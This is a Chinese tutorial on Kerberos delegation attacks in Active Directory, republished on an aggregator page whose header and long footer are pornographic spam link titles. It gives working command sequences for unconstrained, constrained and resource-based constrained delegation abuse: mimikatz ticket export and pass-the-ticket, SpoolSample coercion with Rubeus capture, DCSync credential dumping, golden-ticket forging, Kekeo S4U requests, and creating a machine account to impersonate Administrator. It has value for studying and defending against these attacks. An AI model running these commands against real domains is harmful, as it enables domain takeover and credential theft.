日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

域渗透-委派攻击

發布時間:2024/1/1 编程问答 40 豆豆
生活随笔 收集整理的這篇文章主要介紹了 域渗透-委派攻击 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

域委派是大型網絡中經常部署的應用模式,給多跳認證帶來很大的便利,同時也帶來很大的安全隱患,利用委派可獲取域管理員權限,甚至制作深度隱藏的后門。

一:域委派

簡單明了:委派就是將域內用戶的權限委派給服務賬號,使得服務賬號能以用戶權限訪問域內其他服務。將我的權限給服務賬戶

1.1:委派流程

User(laosec\jack)--訪問-->Websrv(以User身份)--訪問-->Service(文件服務器)

需求:jack需要登陸到后臺文件服務器,經過Kerberos認證的過程如下:

  • 域內用戶jack以Kerberos協議認證登錄,將憑證發送給websvc;
  • Web服務以websvc服務賬號運行,websvc向KDC發起jack用戶的票據申請;
  • KDC檢查websvc用戶的委派屬性,如果被設置,KDC中AS則返回jack用戶的可轉移票據TGT;
  • websvc收到jack用戶TGT后,使用該票據向KDC中的TGS申請訪問文件服務器的服務票據ST;
  • KDC檢查websvc的委派屬性,如果可以委派,并且權限允許,那么返回jack訪問服務的ST票據;
  • websvc使用jack的服務ST票據請求后臺文件服務器,完成多跳級認證;
  • 注意:在域中只有主機賬號和 服務賬號才具有委派屬性

    • 主機賬號:AD活動目錄中Computers中的計算機也可以稱為機器賬號(一個普通域用戶默認最多可以創建十個主機賬號)
    • 服務賬號:Service Account是域內用戶的一種類型,是服務器運行服務時所用的賬號,將服務運行起來并加入域。例如SQL Server 在安裝時會在域內自動注冊服務賬號SQLServiceAccount。也可以將域用戶通過注冊SPN變為服務賬號。

    ***使用前提***

    • 需要被委派的用戶未設置不允許被委派屬性。

    administrator用戶設置了敏感賬號不能被委派所以該用戶不能被委派。

    1.2:委派分類

    二:委派攻擊之非約束性委派

    2.1:非約束性委派

    對于非約束性委派Unconstrained Delegation服務賬號可以獲取被委派用戶的TGT,并將TGT緩存到LSASS進程中,從而服務賬號可使用該TGT模擬用戶訪問任意服務。。非約束委派的設置需要SeEnableDelegation特權該特權通常僅授予域管理員 。

    ***配置非約束性委派***

    WIN10$服務賬戶配置了非約束性委派,那么它可以接受任意用戶的委派去請求任意服務。

    ***租房案例***

  • 任意用戶就是租客
  • WIN10$服務賬戶是中介
  • 任意服務是房東
  • 租客把自己的錢交給中介,中介拿著錢交給房東申請租房。那么這個過程中,WIN10$是擁有了任意用戶的"錢"(憑證)的。協議層面講,用戶A委派WIN10$訪問WEB服務,那么用戶會將TGT緩存在WIN10的lsass中,DM再模擬這個用戶去訪問服務。

    2.2:非約束性委派流程

    前提:在服務A上配置到服務B約束性委派(域管理員才有權限配置)

  • 用戶訪問機器B的某個服務,于是向KDC認證;KDC會檢查機器B的機器賬號的屬性,發現是非約束性委派,KDC會將用戶的TGT放在ST服務票據中。
  • 用戶訪問機器B時,TGT票據會和ST服務票據一同發送給機器B。
  • 這樣B在驗證ST服務票據的同時獲取了用戶的TGT并將TGT存儲在LSASS進程中從而可以模擬用戶訪問任意服務。
  • 思考從網絡攻擊的角度來看如果攻擊者控制了機器B的機器賬號并且機器B配置了非約束性委派。則攻擊者可以誘騙管理員來訪問機器B然后攻擊者可以獲取管理員的TGT從而模擬管理員訪問任意服務即獲得了管理員權限

    2.3:篩選非約束性委派的主機或服務賬戶

    當服務賬號或者主機被設置為非約束性委派時,賬戶增加了一個TRUSTED_TO_AUTH_FOR_DELEGATION的標志位,對應的值是0x80000,也即是524288。其userAccountControl屬性會包含TRUSTED_FOR_DELEGATION可以用ldap協議查詢篩選。(adsiedit.msc)

    2.3.1:PowerSploit

    1? Import-Module .\PowerView.ps1; ? ? //PowerSploit下的PowerView
    2? ?#查詢域中配置非約束委派的主機
    3? ?Get-NetComputer -Unconstrained -Domain laosec.cn
    4? ?#查詢域中配置非約束委派的服務賬戶
    5? ?Get-NetUser -Unconstrained -Domain laosec.cn | select name

    注意:域控默認設置的是非約束性委派

    2.3.2:AdFind

    1 #查詢域中配置非約束委派的主機
    2 AdFind.exe -b "DC=laosec,DC=cn" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn
    3 #查詢域中配置非約束委派的服務賬戶
    4 AdFind.exe -b "DC=laosec,DC=cn" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn

    2.4:非約束性委派攻擊

    ***實驗環境***

    角色

    系統

    用戶

    IP

    域控

    Windows server 2008 R2(DC)

    administrator(域管理員)

    192.168.1.*

    具有非約束性委派的主機

    Windows server 2008 R2(WEB)

    hack(域普通用戶)

    192.168.1.*

    步驟一:在域控上設置WEB具有非約束性委派屬性并在WEB中訪問DC共享,提示拒絕訪問。

    步驟二:在域控上用administrator身份訪問WEB機器(可以使用管理員登陸域內任何機器,不一定非要是域控)

    步驟三:此時在WEB主機上的Lsass.exe內存中就會有域管理員的TGT票據,使用mimikatz導出:

    privilege::debug
    sekurlsa::tickets /export

    步驟四:使用mimikatz將票據導入內存中,并訪問域控

    1 導入票據
    2 kerberos::ptt [0;89b3d]-2-0-60a00000-administrator@krbtgt-laosec.cn.kirbi
    3 查看票據
    4 kerberos::list

    步驟五:訪問Win10

    注意:實戰中應該誘使DC訪問我們的WEB機器。

    2.5:SPooler打印機服務

    利用Windows打印系統遠程協議(MS-RPRN)中的一種舊的但是默認啟用的方法,在該方法中,域用戶可以使用MS-RPRNRpcRemoteFindFirstPrinterChangeNotification(Ex)方法強制任何運行了Spooler服務的計算機以通過Kerberos或NTLM對攻擊者選擇的目標進行身份驗證。

    ***實驗環境***

    角色

    系統

    用戶

    IP

    域控

    Windows server 2012R2(DC)

    administrator(域管理員)

    192.168.1.*

    客戶機

    Windows 10(WIN10)

    laosec(域內普通成員)

    192.168.1.*

    工具地址:

    • GitHub - leechristensen/SpoolSample: PoC tool to coerce Windows hosts authenticate to other machines via the MS-RPRN RPC interface. This is possible via other protocols as well.
    • GitHub - GhostPack/Rubeus: Trying to tame the three-headed dog.

    ***實驗槽點***

  • 進行實驗之前一定要把所有的防火墻關閉!所有的防火墻關閉!所有的防火墻關閉!
  • 進行實驗之前一定要把所有的防火墻關閉!所有的防火墻關閉!所有的防火墻關閉!
  • 進行實驗之前一定要把所有的防火墻關閉!所有的防火墻關閉!所有的防火墻關閉!
  • 第一步:開啟WIN10這個主機賬戶的非約束性委派,并開始編譯工具!

    1 鏈接:https://pan.baidu.com/s/1zACojH6SaMhvLqvKNS_t_g?
    2 提取碼:ugrs?
    3 復制這段內容后打開百度網盤手機App,操作更方便哦--來自百度網盤超級會員V1的分享

    步驟二:以administrator身份打開cmd并執行Rubeus來監聽來自DC的4624登錄日志

    1 Rubeus.exe monitor /interval:1 /filteruser:DC$
    2 # 我們可以用Rubeus來監聽Event ID為4624的事件,這樣可以第一時間截取到域控的TGT
    3 # /interval:1 設置監聽間隔1秒
    4 # /filteruser 監聽對象為我們的域控,注意后面有個$,如果不設置監聽對象就監聽所有的TGT

    步驟三:隨便打開一個cmd運行SpoolSample程序來讓域控向WIN10主機驗證身份

    1 SpoolSample_v4.5_x64.exe DC WIN10
    2 # 表示利用打印服務強制讓域控機向WIN2008主機驗證身份,這樣我們的Rubeus就可以監聽到TGS了

    雖然報錯,但是Rubeus已經接收到了TGT

    步驟四:提取TGS,使用powershell對Rubeus監聽到的base64編碼進行轉換到正常的TGT

    [IO.File]::WriteAllBytes("絕對路徑\TGS\ticket.kirbi", [Convert]::FromBase64String("得到的base64"))

    步驟五:制作黃金票據

    1.注入TGS票據并提取用戶Hash

    kerberos::ptt ticket.kirbi
    kerberos::list
    lsadump::dcsync /domain:sfang.com /all /csv

  • 開始制作黃金票據,并獲取域控制器
  • 1 whoami /user
    2 # S-1-5-21-563506510-1219464096-2194379905
    3 # 得到上面的SID,注意不需要后面表示賬號權限的幾位數

    4 kerberos::golden /domain:sfang.com /sid:S-1-5-21-563506510-1219464096-2194379905 /krbtgt:930bf8bc4b39d1b7840a2eadc4200932 /user:administrator /ticket:ntlm.kirbi ? ? ? ? //制作黃金票據

    三:委派攻擊之約束性委派

    3.1:約束性委派

    為了進行約束性委派,微軟在Kerberos協議的TGS_REQ&TGS_REP階段引入了兩個擴展子協議S4u2Self(Service for User to Self) 和S4u2Proxy(Service for User to Proxy)。S4u2self可以代表任意用戶請求針對其自身的Kerberos服務票據(ST);S4u2Proxy可以以上一步用戶的名義請求其它服務的服務票據。約束性委派就是限制了S4u2Proxy擴展的范圍。

    3.2:約束性委派流程

    前提:在服務A上配置到服務B約束性委派(域管理員才有權限配置)

  • 用戶訪問服務A于是向域控進行kerberos認證域控返回ST1服務票據給用戶用戶使用此服務票據訪問服務A
  • 若該服務A允許委派給服務B則A能使用S4U2Proxy協議將用戶發送給自己的可轉發的ST1服務票據以用戶的身份再轉發給域控制器。于是域控返回給服務A一個ST2服務票據
  • 服務A便能使用獲得的ST2服務票據以用戶的身份訪問服務B。
  • 從網絡攻擊的角度來看如果攻擊者控制了服務A的賬號并且服務A配置了到域控的CIFS服務的約束性委派。則攻擊者可以利用服務A以administrator身份訪問域控的CIFS服務即相當于控制了域控。

    3.3:S4u2Self

    當用戶以其他方式(如NTLM認證、基于表單的認證等方式)與Web服務進行認證后用戶是無法向Web服務器提供請求該服務的ST服務票據的因而服務器也無法進一步使用S4U2Proxy協議請求訪問服務B。S4U2Self協議便是解決該問題的方案被配置為約束委派的服務能夠調用S4U2Self向KDC為任意用戶請求訪問自身的可轉發的服務票據此后便可通過S4U2Proxy使用這張ST票據向域控制器請求訪問B的票據。這里需要注意的是服務代表用戶獲得針對服務自身ST票據這個過程是不需要用戶的憑據的。

    S4U2Self的過程如下圖所示(請求服務之前需要申請可轉發的 TGT 即需要向域控認證賬戶密碼)

    步驟1中,TGS_REQ的請求包的padata中有PA_FOR_USER字段,類型為S4u2Self,并且在KDC-options協商中設置返回的ST票據為可轉發forwardable。向KDC請求 代表administrator用戶訪問自身服務 的ST服務票據,我們稱之為ST1

    步驟2中,KDC檢驗通過后將ST服務票據的 票證標志 字段設置為可轉發,發送給服務賬號。主要檢驗以下幾點

    • TGT是否是可以轉發的
    • 服務是否配置了約束委派屬性
    • 服務是否請求了可轉發選項

    3.4:S4u2Proxy

    S4U2Proxy 使得服務1可以使用來自用戶的授權( 在S4u2self階段獲得),然后用該ST1票據(放在AddtionTicket里面)向KDC請求訪問服務2的TGS,并且代表用戶訪問服務2,而且只能訪問服務2。

    S4u2Proxy過程入下圖所示:

    步驟1中,服務1試圖代表用戶獲取服務2的服務票證。服務1發送TGS_REQ消息,并將上一步獲得的ST1服務票證作為 請求中的AddtionTicket

    驟2中,KDC返回以administrator用戶訪問服務2的ST服務票據

    3.5:篩選約束委派的主機或服務賬戶

    3.5.1:Empire

    1 Import-Module .\powerview.ps1; ?//導入Empire下的Powerview.ps1文件

    2 查詢域中配置約束委派的主機

    3 Get-DomainComputer -TrustedToAuth -Domain laosec.cn | select name
    4 查詢域中配置約束委派的賬號
    5 Get-DomainUser -TrustedToAuth -Domain laosec.cn | select name

    3.5.2:AdFind

    1 #查詢域中配置非約束委派的主機
    2 AdFind.exe -b "DC=warsec,DC=com" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" -dn
    3 #查詢域中配置非約束委派的服務賬戶
    4 AdFind.exe -b "DC=warsec,DC=com" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" -dn

    3.6:約束性委派攻擊

    步驟一:在域控上創建SQL賬戶并為其注冊SPN,在用戶屬性中設置約束性委派...(注意:加上SPN之后用戶屬性的委派選項卡才會出現,因為只有服務賬戶和計算機賬戶可以被委派)

    步驟二:在Win10客戶端查找約束委派的服務賬戶...

    步驟三:約束委派需要知道SQL服務賬戶的密碼或者Hash值,現在我們在Win10中使用Kekeo申請TGT

    Kekeo項目地址:https://github.com/gentilkiwi/kekeo

    tgt::ask /user:sql /domain:warsec.com /password:123admiN@

    步驟四:使用該TGT通過S4u偽造administrator@warsec.com去訪問DC的cifs服務...

    tgs::s4u /tgt:TGT_sql@WARSEC.COM_krbtgt~warsec.com@WARSEC.COM.kirbi /user:administrator /service:cifs/dc.warsec.com

    步驟五:通過Mimikatz使用cifs的tgs票據進行PTT

    kerberos::ptt xxx.kirbi
    kerberos::purge

    待續:嘗試抓包分析....

    四:委派攻擊之基于資源的約束性委派

    傳統的委派,在設置的過程中其實都是需要SeEnableDelegation特權,而這個特權需要域管理員才能設置。相對于傳統的委派,基于資源的約束委派它不需要域管理員設置,而是機器本身。

    >>>約束委派和基于資源的約束委派的區別<<<

    約束委派

    通過服務A委派到服務B,實際是在服務A上增加TRUSTED_FOR_DELEGATION字段(非約束委派),TRUSTED_TO_AUTHENTICATE_FOR_DELEGATIONmsDS-AllowedToDelegateTo(約束委派)字段來達到委派的目的。

    基于資源的約束委派

    通過服務B允許服務A委派到服務B,實際是通過服務B自身賦予msDS-AllowedToActOnBehalfOfOtherIdentity字段,從而允許服務A對服務B的基于資源的約束委派。

    所以當利用到基于資源的約束委派的時候,服務A的兩個字段是沒有賦值的,當這兩個字段沒有被賦值的時候,通過S4U2Self得到的ST服務票證是不可被轉發而S4U2Proxy的作用就是將可轉發的ST票據轉發到其他服務進行委派認證的但是在基于資源的約束委派過程中不可轉發的ST仍可以通過S4U2Proxy轉發到其他服務進行委派認證,并且最后還會返回一張可轉發的ST服務票證

    因此,如果能夠在服務B上配置允許服務A的基于資源的約束委派,那么就可以通過控制服務A使用S4U2Self向域控請求任意用戶訪問自身的服務票據,最后再使用S4U2Proxy轉發此ST票據去請求訪問服務B的可轉發的ST服務票據,那么我們就可以模擬任意用戶訪問服務B了。這里可以以普通域用戶的身份去創建機器賬號作為服務A。

    4.1:基于資源的約束性委派流程

    該攻擊由國外安全研究員Elad Shami提出:Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory,他在文章中指出無論服務賬號的UserAccountControl屬性是否被設置為TrustedToAuthForDelegation值,服務自身都可以通過調用S4U2Self來為任意用戶請求自身的服務票據。但是當沒有設置該屬性時,KDC通過檢查服務賬號的TrustedToAuthForDelegation位和msDS-AllowedToDelegateTo這兩個字段,發現沒有被賦值,所以服務自身通過S4U2Self請求到的ST服務票據是不可轉發的,因此不可轉發的ST服務票據是無法通過S4U2Proxy轉發到其他服務進行約束性委派認證的。但是!在基于資源的約束委派過程中,不可轉發的ST服務票據仍然可以通過S4U2Proxy轉發到其他服務進行委派認證,并且最后服務還會返回一張可轉發的ST服務票據!因此,如果我們能夠在服務B上配置允許服務A的基于資源的約束委派,那么我們就可以通過控制服務A使用S4U2Self向域控請求任意用戶訪問自身的服務票據,最后再使用S4U2Proxy轉發此ST票據去請求訪問服務B的可轉發的ST服務票據,那么我們就可以模擬任意用戶訪問服務B了。這里我們可以以普通域用戶的身份去創建機器賬號作為服務A。

    引用其博客文章中的思路圖片說明攻擊步驟:

    前提:在服務2上配置服務1到服務2的基于資源的約束性委派(機器自身有權限可配置)

  • 服務1 使用自己的賬號密碼向KDC申請一個可轉發的TGT票據。
  • 服務1 代表用戶申請一個獲得針對服務1自身的ST服務票據。這一步就是S4U2Self,這一步區別于傳統的約束性委派,在S4U2Self里面提到,返回的ST票據可轉發的一個條件是服務1配置了傳統的約束委派。KDC會檢查服務1 的TrustedToAuthForDelegation位和msDS-AllowedToDelegateTo這個字段。這里由于基于資源的約束委派,是在服務2上配置的,服務2的msDS-AllowedToActOnBehalfOfOtherIdentity屬性配置了服務1 的SPN,服務1并沒有配置TrustedToAuthForDelegation位和msDS-AllowedToDelegateTo字段。因此當KDC檢查服務1 的TrustedToAuthForDelegation位和msDS-AllowedToDelegateTo這兩個字段時,發現并未賦值。因此返回的ST票據是不可轉發的。
  • 服務1可以使用來自用戶的授權( 在S4U2Self階段獲得的不可轉發的ST票據),然后將該不可轉發的ST票據(放在AddtionTicket里面)向KDC請求訪問服務2的可轉發的ST服務票據。
  • 4.2:基于資源的約束委派攻擊危害

    通過利用基于資源的約束委派攻擊,攻擊者能夠使普通域用戶以域管理員身份訪問遠程計算機CIFS等服務,實現本地權限提升。但是僅僅是本地提權,并不能執行域管理員的其他操作!

    4.3:基于資源的約束委派攻擊的條件

    利用基于資源的約束委派(RBCD)需要2個條件:

    • 擁有將域機器加入域的域用戶的權限。(將機器B加入域的域用戶擁有修改機器B的msDS-AllowedToActOnBehalfOfOtherIdentity屬性的權限。)
    • 一個任意服務賬戶或者一個機器賬戶(每一個域用戶都可以添加10個機器賬戶)

    基于資源的約束委派攻擊拓撲圖:

    在企業中,一般會有一個專門將計算機加入域的賬號,如果我們獲取到了該賬號的權限,則可以通過基于資源的約束委派攻擊獲取 通過該賬號加入域的所有機器 的 最高權限。

    4.4:篩選基于資源約束委派的主機或服務賬戶

    1 #查詢域中配置非約束委派的主機
    2 AdFind.exe -b "DC=warsec,DC=com" -f "(&(samAccountType=805306369)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" -dn
    3 #查詢域中配置非約束委派的服務賬戶
    4 AdFind.exe -b "DC=warsec,DC=com" -f "(&(samAccountType=805306368)(msDS-AllowedToActOnBehalfOfOtherIdentity=*))" -dn

    4.5:基于資源的約束委派攻擊

    >>>實驗環境<<<

    操作系統

    登錄賬戶

    權限問題

    Wins2012R2

    warsec.com\administrator

    域內管理員用戶

    Wins2008R2

    warsec.com\test

    域內普通用戶,對當前主機有寫入的權限

    Win10

    warsec.com\laosec

    域內普通用戶

    》》》環境配置《《《

    步驟一:

    • Wins2012R2搭建好域環境并創建test與laosec用戶分別登錄Wins2008R2與Win10機器

    步驟二:設置test的寫權限...使用adsiedit.msc命令

    步驟三:驗證域用戶test對WIN2008是否具有寫的權限可以使用PowerView.ps1腳本來枚舉....

    PowerView.ps1(可在github下載)

    1 Get-DomainUser -Identity test -Properties objectsid ? ? ? ? # 查詢test的SID
    2 Get-DomainObjectAcl -Identity WIN2008 ?| ?{$_.SecurityIdentifier -match "S-1-5-21-2236720874-3430260630-3072917007-1108"} ?# 查看是否有寫權限

    在此,可以看到域賬戶對WIN2008機器賬戶的完全控制權限(GenericAll),其實也不一定需要GenericAll權限,GenericWrite、WriteProperty、WriteDacl等等權限都是可以修改賬戶屬性的。

    步驟四:創建機器賬戶并查詢...

    現在還需要的是一個具有SPN的賬戶,因為S4U2Self只適用于具有SPN的賬戶,恰好的是在域中有一個屬性MachineAccountQuota,這個值表示的是允許用戶在域中創建的計算機帳戶數,默認為10,這意味著我們如果擁有一個普通的域用戶那么我們就可以利用這個用戶最多可以創建十個新的計算機帳戶,而計算機賬戶默認是注冊RestrictedKrbHost/domain和HOST/domain這兩個SPN的,所以這里剛好符合我們的意圖。

    我們可以使用Kevin Robertson的Powermad中的New-MachineAccount來創建一個用戶名為evilsyst0m,密碼為evil的計算機賬戶...

    1 Import-Module .\Powermad.ps1
    2 New-MachineAccount -MachineAccount evilsyst0m -Password $(ConvertTo-SecureString "evil" -AsPlainText -Force)

    Powermad.ps1(可在github上下載)

    查詢機器賬戶是否創建成功....

    net group "domain computers" /domain

    步驟五:配置evilsyst0m到WIN2008的基于資源的約束委派...

    下面是修改win2008的msDS-AllowedToActOnBehalfOfOtherIdentity屬性的值,有兩種方法可以修改,Powerview或者ActiveDirectory模塊

  • 先獲取evilsyst0m的SID
  • Get-NetComputer "evilsyst0m"
  • 配置基于資源的約束委派...
  • $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3298638106-3321833000-1571791979-1112)" #這兒的sid是我們創建的機器用戶evilsystem的sid $SDBytes = New-Object byte[] ($SD.BinaryLength) $SD.GetBinaryForm($SDBytes, 0) Get-DomainComputer WIN2008| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose
  • 驗證是否成功添加....
  • Get-DomainComputer win2008 -Properties msds-allowedtoactonbehalfofotheridentity

  • 以上就表示配置成功了,若想清除msds-allowedtoactonbehalfofotheridentity屬性的值,可用如下命令:
  • Set-DomainObject win2008 -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose

    備注:以上是在Wins2008上修改,若在Wins2012修改為以下步驟...

    1 import-module ./Microsoft.ActiveDirectory.Management.dll
    2 Set-ADComputer yukong -PrincipalsAllowedToDelegateToAccount evilsystem$
    3 這個命令只有在域控上執行才成功,普通用戶機器,即使導入了dll文件,執行的話也會顯示不全。
    4 這個dll文件域控上都有,也可以去https://github.com/shanfenglan/test下載。

    參考位置:基于windows中委派的攻擊思路(下)-基于資源的約束性委派_Shanfenglan's blog-CSDN博客

    》》》攻擊過程《《《

    步驟一:使用Rubeus來請求白銀票據,因為Rubeus不支持明文所以要先轉換為Hash....

    Rubeus.exe hash /user:evilsystem /password:evil /domain:test.com

    步驟二:用evilsystem$的Hash值請求白銀票據并導入到當前回話中...

    1 Rubeus.exe s4u /user:evilsystem$ /rc4:B1739F7FC8377E25C77CFA2DFBDC3EC7 /impersonateuser:Administrator /msdsspn:cifs/win2008 /ptt
    2 dir \\win2008\c$

    防御方法:

    • 將高權限的用戶配置為敏感賬戶。

    參考文章:

    • 前言 - windows protocol
    • https://xz.aliyun.com/t/7454
    • 基于windows中委派的攻擊思路(下)-基于資源的約束性委派_Shanfenglan's blog-CSDN博客
    • Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory | Shenanigans Labs
    • 這是一篇“不一樣”的真實滲透測試案例分析文章 - 奇安信A-TEAM技術博客

    總結

    以上是生活随笔為你收集整理的域渗透-委派攻击的全部內容,希望文章能夠幫你解決所遇到的問題。

    如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

    日本韩国中文字幕 | 丁香婷婷综合色啪 | 精品国模一区二区 | 婷婷新五月 | 天天夜操 | 激情久久久 | 亚洲精品美女久久久久网站 | 日韩精品免费一区二区三区 | 国产精品区免费视频 | 麻豆视频国产在线观看 | 免费人成在线观看网站 | 九九热久久久 | 久久久久国产一区二区 | 在线电影av | 色狠狠综合天天综合综合 | 久久亚洲综合国产精品99麻豆的功能介绍 | 黄色亚洲 | 在线久热 | 最新国产精品久久精品 | 99久久99久久综合 | 91传媒91久久久 | 激情综合色综合久久 | 亚洲精品在线免费看 | 亚洲 欧美 另类人妖 | 国产成人一区二区在线观看 | 国产成人精品av | 91在线小视频 | 亚洲国产视频网站 | a色视频| 国产精品一区二区在线免费观看 | 欧美日韩在线视频一区 | 婷婷国产视频 | 国产伦理久久精品久久久久_ | 成人久久电影 | 久av在线| 国产一区在线精品 | 天天夜夜亚洲 | 91在线www | 色com| 国产精品美女久久久久aⅴ 干干夜夜 | 毛片在线网 | 欧美伦理电影一区二区 | 国产精品久久毛片 | 亚洲精品视频大全 | 色吊丝在线永久观看最新版本 | 99国产精品久久久久老师 | 91看片在线看片 | 国产一级h | 国产精选视频 | 人人射人人爱 | 亚洲国产偷 | 狠狠色香婷婷久久亚洲精品 | 久久国产精品久久精品国产演员表 | 国产盗摄精品一区二区 | 日韩精品不卡在线观看 | 精品国产一区二区三区久久 | 亚洲在线观看av | 伊人久久国产精品 | 91精品视频免费看 | 91看片淫黄大片在线播放 | 日日夜夜骑 | 国产麻豆剧果冻传媒视频播放量 | 久久精品99久久久久久 | 国产三级午夜理伦三级 | 国产自产高清不卡 | 欧美性脚交 | 精品久久在线 | 亚洲专区路线二 | 国产精品18久久久久久久 | 五月丁香 | 粉嫩av一区二区三区免费 | 美女免费黄网站 | 天天躁日日躁狠狠躁av中文 | 免费一级特黄毛大片 | 2020天天干天天操 | 成年人视频在线 | 国产伦精品一区二区三区在线 | 亚洲精品www | 天天射天天舔天天干 | 中文成人字幕 | 米奇四色影视 | 久久久久久蜜桃一区二区 | 婷婷av在线| 人人添人人澡人人澡人人人爽 | 91人人爽久久涩噜噜噜 | 2019免费中文字幕 | 狠狠干婷婷色 | 亚洲一级影院 | av手机版| 精品国产一区二区三区男人吃奶 | 欧洲黄色片 | 久久69精品久久久久久久电影好 | 国产精品久久电影网 | 色国产精品一区在线观看 | 在线观看不卡视频 | 91精品国产一区二区在线观看 | 激情视频综合网 | 亚洲欧洲国产视频 | 国产精成人品免费观看 | 日韩在线网址 | 在线免费高清一区二区三区 | 午夜视频免费 | 国产美女免费观看 | 久久综合操 | 天天色中文| 亚洲精品福利在线 | 国产精品一区二区久久久 | 久久人视频 | 91伊人影院| 国产成在线观看免费视频 | 欧美精品久久久久久久久久 | 中文字幕国产精品 | 91在线看视频 | 一区二区三区免费 | 久久久久久久久久久久久久电影 | 精品成人免费 | 99视频久久 | 69国产精品视频 | 天天在线视频色 | av亚洲产国偷v产偷v自拍小说 | 国产一级免费视频 | 在线观看视频97 | 久久五月精品 | 国产精品国产亚洲精品看不卡15 | 国产日韩精品一区二区三区在线 | 国产成人精品一区二区三区在线 | 国产精品久久久视频 | 在线播放视频一区 | 在线а√天堂中文官网 | 欧美日韩中文字幕视频 | 丁香婷婷综合激情 | 99精品视频在线观看视频 | 三级免费黄| 国产精品免费看久久久8精臀av | 在线观看aa | 成人午夜免费剧场 | 欧美一区日韩精品 | 午夜久久影院 | 三级在线播放视频 | 综合伊人久久 | 奇米777777| 久久99国产一区二区三区 | 在线观看精品一区 | 日韩美女高潮 | 国产麻豆精品一区二区 | 激情综合亚洲 | 精品自拍sae8—视频 | 国产精品日韩欧美一区二区 | 深爱激情久久 | 欧美少妇xxxxxx | 久久久久久久久久久久电影 | 亚洲日本一区二区在线 | 成人久久久久久久久久 | 国产一区精品在线观看 | www.色就是色| 久久在线免费 | 日韩黄色在线 | 人人网人人爽 | 久久久国产一区 | 99色 | 婷婷中文字幕在线观看 | 黄色aaa毛片 | 欧美一级免费黄色片 | 欧美激情一区不卡 | 成人av在线网 | 又黄又色又爽 | 在线a视频 | 久久久久免费精品国产小说色大师 | 久久久久久久久亚洲精品 | 超碰人人99 | 日韩精品一区在线观看 | 亚洲综合色站 | 人人干,人人爽 | 毛片美女网站 | 午夜精品久久久99热福利 | 天堂av观看 | 九九九国产 | va视频在线观看 | 日韩精品中文字幕在线播放 | 久久一区二区免费视频 | 三级黄色a | 色偷偷网站视频 | 玖玖精品在线 | 国产一级片免费观看 | 在线视频精品 | 中文av在线播放 | 黄色成人av | 在线v片免费观看视频 | 中文在线a∨在线 | 日韩av一区二区在线播放 | 在线只有精品 | 成人免费在线看片 | 特级黄色电影 | 亚洲精品一区二区18漫画 | 国产视频首页 | 天天搞天天干天天色 | 成年人免费在线播放 | 久久久久亚洲精品中文字幕 | 国产九九热视频 | 久久精品影片 | 久久9视频 | 丝袜美女视频网站 | 中文字幕在线免费 | japanesexxxxfreehd乱熟| 国产视频二 | 日韩一二三 | 九九免费精品视频 | 婷婷国产在线观看 | 人人狠狠综合久久亚洲婷 | 国产高清在线永久 | 91在线文字幕| 午夜天天操| 97色狠狠 | 精品国产一区二区三区免费 | av千婊在线免费观看 | 日韩3区 | 久久久91精品国产 | 日韩中文字幕免费在线观看 | 亚洲片在线资源 | 九九久| aaa毛片视频 | 黄色大片中国 | 国产在线观看你懂得 | 18国产精品福利片久久婷 | 日日摸日日添日日躁av | 麻豆视频成人 | 亚洲精品国产片 | 国产成人精品一区二区三区福利 | 国产在线播放一区二区 | 91精品久久久久久综合五月天 | 亚洲精品福利视频 | 一区av在线播放 | 亚洲午夜激情网 | 五月色婷 | 波多野结衣最新 | 欧美日产在线观看 | 婷婷久久一区 | 少妇性色午夜淫片aaaze | 国产系列 在线观看 | 亚洲精品视频在线看 | 亚洲欧美国产精品va在线观看 | 高清不卡一区二区三区 | 亚洲高清免费在线 | 欧美性天天 | 夜夜高潮夜夜爽国产伦精品 | 亚洲国产精品久久 | 天天拍夜夜拍 | 日韩精品免费一区二区 | 成人影片在线免费观看 | 蜜桃视频在线观看一区 | 亚洲性视频 | 一级黄色片在线免费观看 | 亚洲一级黄色大片 | 婷婷色av | 亚洲乱码中文字幕综合 | 中文字幕久久久精品 | 天天爽人人爽 | 国产99久久久国产精品 | 五月婷婷激情综合网 | 国产精品欧美一区二区三区不卡 | 亚洲永久精品在线观看 | 中文字幕在线日亚洲9 | 97碰在线| 成人av网站在线播放 | 国产一区二区成人 | 狠狠色丁香婷婷综合最新地址 | 国产在线国产 | 国产高清视频网 | 日韩有码欧美 | 国产精品视频地址 | 欧美激情第一页xxx 午夜性福利 | 99久久久久成人国产免费 | japanesefreesexvideo高潮 | 久久精品99国产精品日本 | 国产中年夫妇高潮精品视频 | 色偷偷88欧美精品久久久 | 国产一二三四在线视频 | 在线精品视频免费观看 | 在线视频日韩精品 | 免费成视频 | 国产精品一级在线 | freejavvideo日本免费 | 国产又粗又猛又爽 | 色在线高清 | 黄色精品免费 | 国产精品久久久久av福利动漫 | 天天躁日日躁狠狠躁 | 黄色一级在线视频 | 玖玖视频精品 | 色综合久久中文综合久久牛 | 日本动漫做毛片一区二区 | 91精品国产麻豆国产自产影视 | 精品久久久久久国产偷窥 | 深夜免费福利视频 | 888av| 欧美精品生活片 | 欧美va日韩va | 亚洲精品国产精品乱码在线观看 | 国产精品免费小视频 | 久久99国产精品免费 | 亚洲成人999 | 国产精品久久久久久一二三四五 | 九热精品 | 国产精品一区二区视频 | 欧美一级免费高清 | 国产在线精品国自产拍影院 | 一区二区三区中文字幕在线 | 日韩av二区| 日韩精品视频免费在线观看 | www.色爱| 日韩激情中文字幕 | www操操 | 激情图片久久 | 色www.| av在线之家电影网站 | 久久精品视频中文字幕 | 午夜精品视频免费在线观看 | 正在播放一区二区 